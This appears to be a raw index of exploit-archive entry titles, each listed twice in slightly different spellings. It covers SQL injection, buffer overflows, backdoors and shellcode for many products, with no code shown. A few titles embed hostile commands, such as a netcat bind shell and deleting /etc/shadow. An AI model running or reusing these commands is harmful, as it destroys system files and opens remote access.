phpGreetCards - 'conf.inc'Config File Disclosure phpAdBoard - 'conf.inc' Remote Config File Disclosure phpGreetCards - 'conf.inc' Config File Disclosure phpAdBoardPro - 'config.inc'Config File Disclosure phpDatingClub - 'conf.inc'File Disclosure Job2C - 'conf.inc'Config File Disclosure phpAdBoardPro - 'config.inc' Config File Disclosure phpDatingClub - 'conf.inc' File Disclosure Job2C - 'conf.inc' Config File Disclosure Star Downloader Free 1.45 - '.dat'Universal SEH Overwrite Star Downloader Free 1.45 - '.dat' Universal SEH Overwrite Destiny Media Player 1.61 - '.rdl'Local Buffer Overflow Destiny Media Player 1.61 - '.rdl' Local Buffer Overflow Thickbox Gallery 2 - 'index.php ln'Local File Inclusion Thickbox Gallery 2 - 'index.php ln' Local File Inclusion Symantec Fax Viewer Control 10 - 'DCCFAXVW.DLL'Remote Buffer Overflow Exploit Symantec Fax Viewer Control 10 - 'DCCFAXVW.dll' Remote Buffer Overflow Exploit Mercury Audio Player 1.21 - '.b4s'Local Stack Overflow Mercury Audio Player 1.21 - '.b4s' Local Stack Overflow RM Downloader - '.smi'Local Stack Overflow RM Downloader - '.smi' Local Stack Overflow RM Downloader - '.smi'Universal Local Buffer Overflow RM Downloader - '.smi' Universal Local Buffer Overflow RM Downloader 3.0.0.9 - '.RAM'Local Buffer Overflow Mini-stream ASX to MP3 Converter 3.0.0.7 - '.RAM'Buffer Overflow Mini-stream ASX to MP3 Converter 3.0.0.7 - '.asx HREF'Local Buffer Overflow Exploit Mini-stream Ripper 3.0.1.1 - '.RAM'Local Buffer Overflow RM Downloader 3.0.0.9 - '.RAM' Local Buffer Overflow Mini-stream ASX to MP3 Converter 3.0.0.7 - '.RAM' Buffer Overflow Mini-stream ASX to MP3 Converter 3.0.0.7 - '.asx HREF' Local Buffer Overflow Exploit Mini-stream Ripper 3.0.1.1 - '.RAM' Local Buffer Overflow Mini-stream RM-MP3 Converter 3.0.0.7 - '.RAM'Local Buffer Overflow Exploit Mini-stream RM-MP3 Converter 3.0.0.7 - '.RAM' Local Buffer Overflow Exploit MPLAB IDE 8.30 - '.mcp'Universal Seh Overwrite MPLAB IDE 8.30 - '.mcp' Universal Seh Overwrite Pinnacle Studio 12 - '.hfz'Directory Traversal Pinnacle Studio 12 - '.hfz' Directory Traversal COWON America jetCast 2.0.4.1109 - '.mp3'Local Overflow COWON America jetCast 2.0.4.1109 - '.mp3' Local Overflow R2 Newsletter Lite/Pro/Stats - 'admin.mdb'Database Disclosure R2 Newsletter Lite/Pro/Stats - 'admin.mdb' Database Disclosure phpDatingClub 3.7 - SQL / Cross-Site Scripting Injection phpDatingClub 3.7 - SQL Injection / Cross-Site Scripting Injection ClearContent - 'image.php url'Remote File Inclusion / Local File Inclusion ClearContent - 'image.php url' Remote File Inclusion / Local File Inclusion DJ Calendar - 'DJcalendar.cgi TEMPLATE'File Disclosure DJ Calendar - 'DJcalendar.cgi TEMPLATE' File Disclosure Icarus 2.0 - '.ICP'Local Stack Overflow Exploit Icarus 2.0 - '.ICP' Local Stack Overflow Exploit MixSense 1.0.0.1 DJ Studio - '.mp3'Crash Exploit MixSense 1.0.0.1 DJ Studio - '.mp3' Crash Exploit htmldoc 1.8.27.1 - '.html'Universal Stack Overflow htmldoc 1.8.27.1 - '.html' Universal Stack Overflow Acoustica MP3 Audio Mixer 2.471 - '.sgp'Crash Exploit Acoustica MP3 Audio Mixer 2.471 - '.sgp' Crash Exploit PHP Paid 4 Mail Script - 'paidbanner.php ID'SQL Injection PHP Paid 4 Mail Script - 'paidbanner.php ID' SQL Injection Microsoft Windows XP - 'win32k.sys'Privilege Escalation Microsoft Windows XP - 'win32k.sys' Privilege Escalation Portel 2008 - 'decide.php patron'Blind SQL Injection Portel 2008 - 'decide.php patron' Blind SQL Injection Microsoft Windows 2003 - '.EOT'BSOD Crash Exploit Microsoft Windows 2003 - '.EOT' BSOD Crash Exploit THOMSON ST585 - 'user.ini'Arbitrary Download THOMSON ST585 - 'user.ini' Arbitrary Download PHP Email Manager - 'remove.php ID'SQL Injection PHP Email Manager - 'remove.php ID' SQL Injection WAR-FTPD 1.65 - (MKD/CD Requests) Denial of Service War-FTPD 1.65 - (MKD/CD Requests) Denial of Service EMO Breader Manager - 'video.php movie'SQL Injection EMO Breader Manager - 'video.php movie' SQL Injection Invisible Browsing 5.0.52 - '.ibkey'Local Buffer Overflow Invisible Browsing 5.0.52 - '.ibkey' Local Buffer Overflow HotWeb Rentals - 'details.asp PropId'Blind SQL Injection HotWeb Rentals - 'details.asp PropId' Blind SQL Injection Blender 2.34 / 2.35a / 2.4 / 2.49b - '.blend'Command Injection Blender 2.34 / 2.35a / 2.4 / 2.49b - '.blend' Command Injection Blender 2.49b - '.blend'Remote Command Execution Blender 2.49b - '.blend' Remote Command Execution Aiocp 1.4.001 - File Inclusion AIOCP 1.4.001 - File Inclusion BibTeX - '.bib'File Handling Memory Corruption BibTeX - '.bib' File Handling Memory Corruption PHP 5.0.0 - domxml_open_file() Local Denial of Service PHP 5.0.0 - 'domxml_open_file()' Local Denial of Service PHP 5.0.0 - simplexml_load_file() Local Denial of Service PHP 5.0.0 - 'simplexml_load_file()' Local Denial of Service MuPDF < 20091125231942 - pdf_shade4.c Multiple Stack-Based Buffer Overflows MuPDF < 20091125231942 - pdf_shade4.c Multiple Stack Based Buffer Overflows Audacity 1.2.6 - '.gro'Buffer Overflow Audacity 1.2.6 - '.gro' Buffer Overflow gAlan - '.galan'Universal Buffer Overflow gAlan - '.galan' Universal Buffer Overflow ASPGuest - 'edit.asp ID'Blind SQL Injection Smart ASPad - 'campaignEdit.asp CCam'Blind SQL Injection ASPGuest - 'edit.asp ID' Blind SQL Injection Smart ASPad - 'campaignEdit.asp CCam' Blind SQL Injection dblog - 'dblog.mdb'Remote Database Disclosure dblog - 'dblog.mdb' Remote Database Disclosure PHP 5.0.0 - xmldocfile() Local Denial of Service PHP 5.0.0 - 'xmldocfile()' Local Denial of Service Apollo Player 37.0.0.0 - '.aap'Buffer Overflow Denial of Service Apollo Player 37.0.0.0 - '.aap' Buffer Overflow Denial of Service OpenOffice - '.slk'Parsing Null Pointer OpenOffice - '.slk' Parsing Null Pointer crownweb - 'page.cfm'SQL Injection crownweb - 'page.cfm' SQL Injection OtsTurntables Free 1.00.047 - '.olf'Universal Buffer Overflow OtsTurntables Free 1.00.047 - '.olf' Universal Buffer Overflow Windows Media Player 11.0.5721.5145 - '.mpg'Buffer Overflow Windows Media Player 11.0.5721.5145 - '.mpg' Buffer Overflow Orbital Viewer 1.04 - '.orb'Local Universal SEH Overflow Orbital Viewer 1.04 - '.orb' Local Universal SEH Overflow iPhone / iTouch FTPDisc 1.0 3 - ExploitsInOne Buffer Overflow Denial of Service iPhone / iTouch FtpDisc 1.0 3 - ExploitsInOne Buffer Overflow Denial of Service JAD java decompiler 1.5.8g - '.class'Stack Overflow Denial of Service JAD java decompiler 1.5.8g - '.class' Stack Overflow Denial of Service Media Player 6.4.9.1 with K-Lite Codec Pack - Denial of Service/Crash '.avi' Media Player 6.4.9.1 with K-Lite Codec Pack - '.avi' Denial of Service/Crash no$gba 2.5c - '.nds'Local crash no$gba 2.5c - '.nds' Local crash Xilisoft Blackberry Ring Tone Maker - '.wma'Local Crash Xilisoft Blackberry Ring Tone Maker - '.wma' Local Crash Dualis 20.4 - '.bin'Local Daniel Of Service Dualis 20.4 - '.bin' Local Daniel Of Service DSEmu 0.4.10 - '.nds'Local Crash Exploit DSEmu 0.4.10 - '.nds' Local Crash Exploit MP3 Wav Editor 3.80 - '.mp3'Local Denial of Service MP3 Wav Editor 3.80 - '.mp3' Local Denial of Service FontForge - .BDF Font File Stack-Based Buffer Overflow FontForge - .BDF Font File Stack Based Buffer Overflow Dolphin 2.0 - '.elf'Local Daniel Of Service Dolphin 2.0 - '.elf' Local Daniel Of Service e-webtech - 'new.asp?id='SQL Injection e-webtech - 'new.asp?id=' SQL Injection SmallFTPD FTP Server 1.0.3 - DELE Command Denial of Service SmallFTPd FTP Server 1.0.3 - DELE Command Denial of Service RahnemaCo - page.php PageID Remote File Inclusion RahnemaCo - 'page.php' PageID Remote File Inclusion goffgrafix - Design's SQL Injection goffgrafix - Design's - SQL Injection Spaceacre - SQL / Cross-Site Scripting / HTML Injection Spaceacre - SQL Injection / Cross-Site Scripting / HTML Injection ZipExplorer 7.0 - '.zar'Denial of Service ZipExplorer 7.0 - '.zar' Denial of Service ArcServe UDP 6.0.3792 Update 2 Build 516 - Unquoted Service Path Privilege Escalation iOS - Version-independent shellcode iOS - Version-independent Shellcode Windows 5.0 < 7.0 x86 - Null Free bindshell port 28876 shellcode Windows 5.0 < 7.0 x86 - Null Free bindshell port 28876 Shellcode Win32 - SEH omelet shellcode Win32 - SEH omelet Shellcode Win32 - Connectback_ receive_ save and execute shellcode Win32 - Connectback_ receive_ save and execute Shellcode Windows XP - download and exec source shellcode Windows XP - download and exec source Shellcode Win32 XP SP3 - ShellExecuteA shellcode Linux/x86 - setreuid (0_0) & execve(/bin/rm /etc/shadow) shellcode Win32 XP SP3 - Add Firewall Rule to allow TCP traffic on port 445 shellcode Win32 XP SP3 - ShellExecuteA Shellcode Linux/x86 - setreuid (0_0) & execve(/bin/rm /etc/shadow) Shellcode Win32 XP SP3 - Add Firewall Rule to allow TCP traffic on port 445 Shellcode Win32 - JITed stage-0 shellcode Win32 - JITed stage-0 Shellcode Windows - JITed egg-hunter stage-0 shellcode Windows - JITed egg-hunter stage-0 Shellcode Linux/x86 - nc -lvve/bin/sh -p13377 shellcode Linux/x86 - nc -lvve/bin/sh -p13377 Shellcode Corel VideoStudio Pro X3 - '.mp4'Buffer Overflow Corel VideoStudio Pro X3 - '.mp4' Buffer Overflow Boat Classifieds - 'printdetail.asp?Id'SQL Injection Boat Classifieds - 'printdetail.asp?Id' SQL Injection PHPBB MOD 2.0.19 - Invitation Only (PassCode Bypass) phpBB MOD 2.0.19 - Invitation Only (PassCode Bypass) SnoGrafx - 'cat.php?cat'SQL Injection SnoGrafx - 'cat.php?cat' SQL Injection Mediacoder 0.7.5.4710 - 'Universal' SEH Buffer Overflow Mediacoder 0.7.5.4710 - ' Universal' SEH Buffer Overflow PlayPad Music Player 1.12 - '.mp3'Denial of Service PlayPad Music Player 1.12 - '.mp3' Denial of Service Linux Kernel < 2.6.36-rc4-git2 (x86_64) - 'ia32syscal'l Emulation Privilege Escalation Linux Kernel < 2.6.36-rc4-git2 (x86_64) - 'ia32syscall' Emulation Privilege Escalation xt:Commerce Gambio 2008 - 2010 - ERROR Based SQL Injection 'reviews.php' xt:Commerce Gambio 2008 < 2010 - 'reviews.php' ERROR Based SQL Injection CuteNews - 'index.php?page'Local File Inclusion CuteNews - 'index.php?page' Local File Inclusion Hanso Converter 1.4.0 - '.ogg'Denial of Service Hanso Converter 1.4.0 - '.ogg' Denial of Service ARM - Bindshell port 0x1337 shellcode ARM - Bind Connect UDP Port 68 shellcode ARM - Loader Port 0x1337 shellcode ARM - ifconfig eth0 and Assign Address 192.168.0.2 shellcode ARM - Bindshell port 0x1337 Shellcode ARM - Bind Connect UDP Port 68 Shellcode ARM - Loader Port 0x1337 Shellcode ARM - ifconfig eth0 and Assign Address 192.168.0.2 Shellcode SmallFTPD 1.0.3 - Remote Directory Traversal SmallFTPd 1.0.3 - Remote Directory Traversal HtaEdit 3.2.3.0 - '.hta'Buffer Overflow HtaEdit 3.2.3.0 - '.hta' Buffer Overflow ProFTPD IAC 1.3.x - Remote Root Exploit ProFTPd IAC 1.3.x - Remote Root Exploit VbsEdit 4.7.2.0 - '.vbs'Buffer Overflow Power Audio Editor 7.4.3.230 - '.cda'Denial of Service VbsEdit 4.7.2.0 - '.vbs' Buffer Overflow Power Audio Editor 7.4.3.230 - '.cda' Denial of Service Sitefinity CMS - 'ASP.NET'Arbitrary File Upload Sitefinity CMS - 'ASP.NET' Arbitrary File Upload Native Instruments Traktor Pro 1.2.6 - Stack-based Buffer Overflow Native Instruments Traktor Pro 1.2.6 - Stack Based Buffer Overflow ProFTPD 1.3.3c - Compromised Source Remote Root Trojan ProFTPd 1.3.3c - Compromised Source Remote Root Trojan Dejcom Market CMS - 'showbrand.aspx'SQL Injection Dejcom Market CMS - 'showbrand.aspx' SQL Injection Aesop GIF Creator 2.1 - '.aep'Buffer Overflow Aesop GIF Creator 2.1 - '.aep' Buffer Overflow Apple iPhone Safari - 'JS .'Remote Crash Apple iPhone Safari - 'JS .' Remote Crash Microsoft Windows Fax Services Cover Page Editor - '.cov'Memory Corruption Microsoft Windows Fax Services Cover Page Editor - '.cov' Memory Corruption Win32 - speaking shellcode Win32 - speaking Shellcode ProFTPD mod_sftp - Integer Overflow Denial of Service (PoC) ProFTPd mod_sftp - Integer Overflow Denial of Service (PoC) BWMeter 5.4.0 - '.csv'Denial of Service BWMeter 5.4.0 - '.csv' Denial of Service Magic Music Editor - '.cda'Denial of Service Magic Music Editor - '.cda' Denial of Service wu-ftpd - SITE EXEC/INDEX Format String WU-FTPD - SITE EXEC/INDEX Format String Samba - trans2open Overflow (Solaris SPARC) Samba (Solaris SPARC) - trans2open Overflow FreeFTPd 1.0.10 - Key Exchange Algorithm String Buffer Overflow freeFTPd 1.0.10 - Key Exchange Algorithm String Buffer Overflow Microsoft IIS 4.0 - '.htr'Path Overflow Microsoft IIS 4.0 - '.htr' Path Overflow VariCAD 2010-2.05 EN - '.DWB'Stack Buffer Overflow VariCAD 2010-2.05 EN - '.DWB' Stack Buffer Overflow AOL 9.5 - Phobos.Playlist Import() Stack-based Buffer Overflow AOL 9.5 - Phobos.Playlist Import() Stack Based Buffer Overflow ProFTPD 1.3.2rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow ProFTPD 1.2 < 1.3.0 (Linux) - sreplace Buffer Overflow ProFTPd 1.3.2rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow ProFTPd 1.2 < 1.3.0 (Linux) - sreplace Buffer Overflow ProFTPD 1.3.2rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow ProFTPd 1.3.2rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow PHPBB - viewtopic.php Arbitrary Code Execution phpBB - viewtopic.php Arbitrary Code Execution ProFTPD-1.3.3c - Backdoor Command Execution ProFTPd-1.3.3c - Backdoor Command Execution ABBS Electronic Flash Cards 2.1 - '.fcd'Buffer Overflow ABBS Electronic Flash Cards 2.1 - '.fcd' Buffer Overflow VeryTools Video Spirit Pro 1.70 - '.visprj'Buffer Overflow VeryTools Video Spirit Pro 1.70 - '.visprj' Buffer Overflow Wordtrainer 3.0 - '.ord'Buffer Overflow Wordtrainer 3.0 - '.ord' Buffer Overflow PlaylistMaker 1.5 - '.txt'Buffer Overflow PlaylistMaker 1.5 - '.txt' Buffer Overflow libmodplug 0.8.8.2 - (.abc) Stack-Based Buffer Overflow (PoC) libmodplug 0.8.8.2 - (.abc) Stack Based Buffer Overflow (PoC) MJM QuickPlayer 1.00 Beta 60a / QuickPlayer 2010 - '.s3m'Stack Buffer Overflow MJM Core Player 2011 - '.s3m'Stack Buffer Overflow MJM QuickPlayer 1.00 Beta 60a / QuickPlayer 2010 - '.s3m' Stack Buffer Overflow MJM Core Player 2011 - '.s3m' Stack Buffer Overflow Magix Musik Maker 16 - '.mmm'Stack Buffer Overflow Magix Musik Maker 16 - '.mmm' Stack Buffer Overflow Smallftpd 1.0.3 FTP Server - Denial of Service SmallFTPd 1.0.3 FTP Server - Denial of Service FreeAmp 2.0.7 - '.fat'Buffer Overflow FreeAmp 2.0.7 - '.fat' Buffer Overflow VSFTPD 2.3.4 - Backdoor Command Execution vsftpd 2.3.4 - Backdoor Command Execution OS-X - Universal ROP shellcode OS-X - Universal ROP Shellcode Citrix XenApp / XenDesktop - Stack-Based Buffer Overflow Citrix XenApp / XenDesktop - Stack Based Buffer Overflow World Of Warcraft - 'chat-cache.txt'Local Stack Overflow Denial of Service World Of Warcraft - 'chat-cache.txt' Local Stack Overflow Denial of Service Wav Player 1.1.3.6 - '.pll'Buffer Overflow Wav Player 1.1.3.6 - '.pll' Buffer Overflow Norman Security Suite 8 - 'nprosec.sys'Privilege Escalation Norman Security Suite 8 - 'nprosec.sys' Privilege Escalation Ashampoo Burning Studio Elements 10.0.9 - '.ashprj'Heap Overflow Ashampoo Burning Studio Elements 10.0.9 - '.ashprj' Heap Overflow Cytel Studio 9.0 - '.CY3'Stack Buffer Overflow Cytel Studio 9.0 - '.CY3' Stack Buffer Overflow Xion Audio Player 1.0.127 - '.aiff'Denial of Service Xion Audio Player 1.0.127 - '.aiff' Denial of Service SnackAmp 3.1.3 - '.aiff'Denial of Service SnackAmp 3.1.3 - '.aiff' Denial of Service PHP Ticket System Beta 1 - 'index.php p parameter'SQL Injection PHP Ticket System Beta 1 - 'index.php p parameter' SQL Injection Nokia PC Suite Video Manager 7.1.180.64 - '.mp4'Denial of Service Nokia PC Suite Video Manager 7.1.180.64 - '.mp4' Denial of Service Multimedia Builder 4.9.8 - '.mef'Denial of Service Multimedia Builder 4.9.8 - '.mef' Denial of Service Tftpd32 DNS Server 4.00 - Denial of Service LibreOffice 3.5.3 - '.rtf'FileOpen Crash TFTPD32 DNS Server 4.00 - Denial of Service LibreOffice 3.5.3 - '.rtf' FileOpen Crash Microsoft Wordpad 5.1 - '.doc'Null Pointer Dereference Microsoft Wordpad 5.1 - '.doc' Null Pointer Dereference Lattice Semiconductor PAC-Designer 6.21 - '.PAC'Exploit Lattice Semiconductor PAC-Designer 6.21 - '.PAC' Exploit wu-ftpd 2.4.2 & SCO Open Server 5.0.5 & ProFTPD 1.2 pre1 - realpath Exploit (1) wu-ftpd 2.4.2 & SCO Open Server 5.0.5 & ProFTPD 1.2 pre1 - realpath Exploit (2) WU-FTPD 2.4.2 & SCO Open Server 5.0.5 & ProFTPd 1.2 pre1 - realpath Exploit (1) WU-FTPD 2.4.2 & SCO Open Server 5.0.5 & ProFTPd 1.2 pre1 - realpath Exploit (2) ProFTPD 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (1) ProFTPD 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (2) ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (1) ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (2) ProFTPD 1.2 pre6 - snprintf ProFTPd 1.2 pre6 - snprintf Washington University wu-ftpd 2.5.0 - message Buffer Overflow Washington University WU-FTPD 2.5.0 - message Buffer Overflow GlFtpd 1.17.2 - Exploit glFTPd 1.17.2 - Exploit Oracle Outside-In - .LWP File Parsing Stack-Based Buffer Overflow Oracle Outside-In - .LWP File Parsing Stack Based Buffer Overflow wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (1) wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (2) wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (3) WU-FTPD 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (1) WU-FTPD 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (2) WU-FTPD 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (3) Microsoft Indexing Services for Windows 2000/NT 4.0 - '.htw'Cross-Site Scripting Microsoft Indexing Services for Windows 2000/NT 4.0 - '.htw' Cross-Site Scripting Microsoft Windows Media Player 7.0 - '.wms'Arbitrary Script Microsoft Windows Media Player 7.0 - '.wms' Arbitrary Script Microsoft Internet Explorer 5 - 'INPUT TYPE=FILE' Microsoft Internet Explorer 5 - 'INPUT TYPE=FILE' Exploit ProFTPD 1.2 - SIZE Remote Denial of Service ProFTPd 1.2 - SIZE Remote Denial of Service Microsoft Windows Media Player 7.0 - '.wmz'Arbitrary Java Applet Microsoft Windows Media Player 7.0 - '.wmz' Arbitrary Java Applet wu-ftpd 2.4.2/2.5 .0/2.6.0/2.6.1/2.6.2 - FTP Conversion WU-FTPD 2.4.2/2.5 .0/2.6.0/2.6.1/2.6.2 - FTP Conversion Wu-Ftpd 2.4.2/2.5/2.6 - Debug Mode Client Hostname Format String WU-FTPD 2.4.2/2.5/2.6 - Debug Mode Client Hostname Format String Joe Text Editor 2.8 - '.joerc'Arbitrary Command Execution Joe Text Editor 2.8 - '.joerc' Arbitrary Command Execution whitsoft slimserve ftpd 1.0/2.0 - Directory Traversal WhitSoft slimserve ftpd 1.0/2.0 - Directory Traversal wu-ftpd 2.4/2.5/2.6 / Trolltech ftpd 1.2 / ProFTPD 1.2 / BeroFTPD 1.3.4 FTP - glob Expansion WU-FTPD 2.4/2.5/2.6 / Trolltech ftpd 1.2 / ProFTPd 1.2 / BeroFTPD 1.3.4 FTP - glob Expansion freebsd 4.2-stable ftpd - glob() Buffer Overflow Vulnerabilities FreeBSD 4.2-stable ftpd - glob() Buffer Overflow Vulnerabilities raidenftpd 2.1 - Directory Traversal RaidenFTPd 2.1 - Directory Traversal AV Arcade Free Edition - 'add_rating.php id parameter'Blind SQL Injection AV Arcade Free Edition - 'add_rating.php id parameter' Blind SQL Injection Solaris 2.6/7/8 - SPARC xlock Heap Overflow Solaris 2.6/7/8 -(SPARC) xlock Heap Overflow glFTPD 1.x - LIST Denial of Service glFTPd 1.x - 'LIST' Denial of Service Wu-Ftpd 2.6 - File Globbing Heap Corruption WU-FTPD 2.6 - File Globbing Heap Corruption Joomla RokModule Component - 'index.php module parameter'Blind SQL Injection Joomla RokModule Component - 'index.php module parameter' Blind SQL Injection PHPWebsite 0.8.2 - PHP File Include phpWebSite 0.8.2 - PHP File Include PHPWebSite 0.8.3 - News Message HTML Injection phpWebSite 0.8.3 - News Message HTML Injection PHPWebSite 0.8.3 - article.php Cross-Site Scripting phpWebSite 0.8.3 - article.php Cross-Site Scripting PHPBB Advanced Quick Reply Hack 1.0/1.1 - Remote File Inclusion phpBB Advanced Quick Reply Hack 1.0/1.1 - Remote File Inclusion PHPBB 2.0.3 - search.php Cross-Site Scripting phpBB 2.0.3 - search.php Cross-Site Scripting ProFTPD 1.2.x - STAT Command Denial of Service ProFTPd 1.2.x - STAT Command Denial of Service Joomla Tags - 'index.php tag parameter'SQL Injection Joomla Tags - 'index.php tag parameter' SQL Injection Joomla Commedia Plugin - 'index.php task parameter'SQL Injection Joomla Kunena Component - 'index.php search parameter'SQL Injection Joomla Commedia Plugin - 'index.php task parameter' SQL Injection Joomla Kunena Component - 'index.php search parameter' SQL Injection PHPBB 2.0.3 - privmsg.php SQL Injection phpBB 2.0.3 - privmsg.php SQL Injection Joomla Spider Catalog - 'index.php product_id parameter'SQL Injection Joomla Spider Catalog - 'index.php product_id parameter' SQL Injection Battleaxe Software BTTLXE Forum - login.asp SQL Injection Battleaxe Software BTTLXE Forum - 'login.asp' SQL Injection SudBox Boutique 1.2 - login.php Authentication Bypass SudBox Boutique 1.2 - 'login.php' Authentication Bypass friendsinwar FAQ Manager - 'view_faq.php question parameter'SQL Injection friendsinwar FAQ Manager - 'view_faq.php question parameter' SQL Injection GuildFTPD 0.999.8 - CWD Command Denial of Service GuildFTPd 0.999.8 - CWD Command Denial of Service ProductCart 1.5/1.6/2.0 - login.asp SQL Injection ProductCart 1.5/1.6/2.0 - 'login.asp' SQL Injection SmartCMS - 'index.php idx parameter'SQL Injection SmartCMS - 'index.php idx parameter' SQL Injection mcrypt 2.6.8 - stack-based Buffer Overflow (PoC) mcrypt 2.6.8 - Stack Based Buffer Overflow (PoC) wu-ftpd 2.6.2 - realpath() Off-by-One Buffer Overflow WU-FTPD 2.6.2 - realpath() Off-by-One Buffer Overflow wu-ftpd 2.6.2 / 2.6.0 / 2.6.1 - realpath() Off-by-One Buffer Overflow freeBSD 4.8 - realpath() Off-by-One Buffer Overflow WU-FTPD 2.6.2 / 2.6.0 / 2.6.1 - realpath() Off-by-One Buffer Overflow FreeBSD 4.8 - realpath() Off-by-One Buffer Overflow SmartCMS - 'index.php menuitem parameter'SQL Injection / Cross-Site Scripting SmartCMS - 'index.php menuitem parameter' SQL Injection / Cross-Site Scripting FreeFTPD - Remote Authentication Bypass Exploit freeFTPd - Remote Authentication Bypass Exploit PHPBB 2.0.6 - URL BBCode HTML Injection phpBB 2.0.6 - URL BBCode HTML Injection wzdftpd 0.1 rc5 - Login Remote Denial of Service ProFTPD 1.2.7/1.2.8 - ASCII File Transfer Buffer Overrun WzdFTPD 0.1 rc5 - Login Remote Denial of Service ProFTPd 1.2.7/1.2.8 - ASCII File Transfer Buffer Overrun PHPBB 2.0.x - profile.php SQL Injection phpBB 2.0.x - profile.php SQL Injection PHPBB 2.0.6 - privmsg.php Cross-Site Scripting phpBB 2.0.6 - privmsg.php Cross-Site Scripting Sony PC Companion 2.1 - (DownloadURLToFile()) Stack-based Unicode Buffer Overflow Sony PC Companion 2.1 - (DownloadURLToFile()) Stack Based Unicode Buffer Overflow Sony PC Companion 2.1 - (Load()) Stack-based Unicode Buffer Overflow Sony PC Companion 2.1 - (CheckCompatibility()) Stack-based Unicode Buffer Overflow Sony PC Companion 2.1 - (Admin_RemoveDirectory()) Stack-based Unicode Buffer Overflow SelectSurvey CMS - 'ASP.NET'Arbitrary File Upload Sony PC Companion 2.1 - (Load()) Stack Based Unicode Buffer Overflow Sony PC Companion 2.1 - (CheckCompatibility()) Stack Based Unicode Buffer Overflow Sony PC Companion 2.1 - (Admin_RemoveDirectory()) Stack Based Unicode Buffer Overflow SelectSurvey CMS - 'ASP.NET' Arbitrary File Upload MyBB AwayList Plugin - 'index.php id parameter'SQL Injection MyBB AwayList Plugin - 'index.php id parameter' SQL Injection SmallFTPD 1.0.3 - Remote Denial of Service SmallFTPd 1.0.3 - Remote Denial of Service MyBB - 'editpost.php posthash'SQL Injection Joomla Spider Calendar - 'index.php date parameter'Blind SQL Injection MyBB - 'editpost.php posthash' SQL Injection Joomla Spider Calendar - 'index.php date parameter' Blind SQL Injection Phorum 3.x - login.php HTTP_REFERER Cross-Site Scripting Phorum 3.x - 'login.php' HTTP_REFERER Cross-Site Scripting PHPBB 1.x/2.0.x - search.php Search_Results Parameter SQL Injection phpBB 1.x/2.0.x - search.php Search_Results Parameter SQL Injection Inmatrix Ltd. Zoom Player 8.5 - '.jpeg'Exploit Inmatrix Ltd. Zoom Player 8.5 - '.jpeg' Exploit PHPBB 2.0.x - album_portal.php Remote File Inclusion phpBB 2.0.x - album_portal.php Remote File Inclusion PHPBB 2.0.x - viewtopic.php PHP Script Injection phpBB 2.0.x - viewtopic.php PHP Script Injection JShop E-Commerce Suite 3.0 - page.php Cross-Site Scripting JShop E-Commerce Suite 3.0 - 'page.php' Cross-Site Scripting NullSoft Winamp 2-5 - '.wsz'Remote Code Execution NullSoft Winamp 2-5 - '.wsz' Remote Code Execution phpWebsite 0.7.3/0.8.x/0.9.x - Comment Module CM_pid Cross-Site Scripting phpWebSite 0.7.3/0.8.x/0.9.x - Comment Module CM_pid Cross-Site Scripting Scripts Genie Gallery Personals - 'gallery.php L parameter'SQL Injection Scripts Genie Gallery Personals - 'gallery.php L parameter' SQL Injection Scripts Genie Domain Trader - 'catalog.php id parameter'SQL Injection Scripts Genie Domain Trader - 'catalog.php id parameter' SQL Injection Scripts Genie Games Site Script - 'index.php id parameter'SQL Injection Scripts Genie Games Site Script - 'index.php id parameter' SQL Injection Photodex ProShow Producer 5.0.3297 - '.pxs'Memory Corruption Exploit Photodex ProShow Producer 5.0.3297 - '.pxs' Memory Corruption Exploit Scripts Genie Top Sites - 'out.php id parameter'SQL Injection Scripts Genie Top Sites - 'out.php id parameter' SQL Injection Scripts Genie Hot Scripts Clone - 'showcategory.php cid parameter'SQL Injection Scripts Genie Hot Scripts Clone - 'showcategory.php cid parameter' SQL Injection W-Agora 4.1.6 - a login.php loginuser Parameter Cross-Site Scripting W-Agora 4.1.6 - a 'login.php' loginuser Parameter Cross-Site Scripting PHPWebSite 0.7.3/0.8.x/0.9.3 - User Module HTTP Response Splitting phpWebSite 0.7.3/0.8.x/0.9.3 - User Module HTTP Response Splitting Linux Kernel - 'SCTP_GET_ASSOC_STATS()' Stack-Based Buffer Overflow Linux Kernel - 'SCTP_GET_ASSOC_STATS()' Stack Based Buffer Overflow PHPBB 2.0.x - admin_cash.php Remote PHP File Include phpBB 2.0.x - admin_cash.php Remote PHP File Include UBBCentral UBB.threads 6.2.3/6.5 - login.php Cat Parameter Cross-Site Scripting UBBCentral UBB.threads 6.2.3/6.5 - 'login.php' Cat Parameter Cross-Site Scripting PHPGedView 2.5/2.6 - login.php URL Parameter Cross-Site Scripting PHPGedView 2.5/2.6 - login.php Username Parameter Cross-Site Scripting PHPGedView 2.5/2.6 - login.php Newlanguage Cross-Site Scripting PHPGedView 2.5/2.6 - 'login.php' URL Parameter Cross-Site Scripting PHPGedView 2.5/2.6 - 'login.php' Username Parameter Cross-Site Scripting PHPGedView 2.5/2.6 - 'login.php' Newlanguage Cross-Site Scripting Rebus:list - 'list.php list_id parameter'SQL Injection Rebus:list - 'list.php list_id parameter' SQL Injection SynConnect Pms - 'index.php loginid parameter'SQL Injection SynConnect Pms - 'index.php loginid parameter' SQL Injection Groovy Media Player 3.2.0 - '.mp3'Buffer Overflow Groovy Media Player 3.2.0 - '.mp3' Buffer Overflow glFTPD 1.x/2.0 ZIP Plugins - Multiple Directory Traversal Vulnerabilities glFTPd 1.x/2.0 'ZIP' Plugins - Multiple Directory Traversal Vulnerabilities PHPWebSite 0.x - Image File Processing Arbitrary PHP File Upload phpWebSite 0.x - Image File Processing Arbitrary PHP File Upload PHPBB 2.0.x - Authentication Bypass (1) PHPBB 2.0.x - Authentication Bypass (2) PHPBB 2.0.x - Authentication Bypass 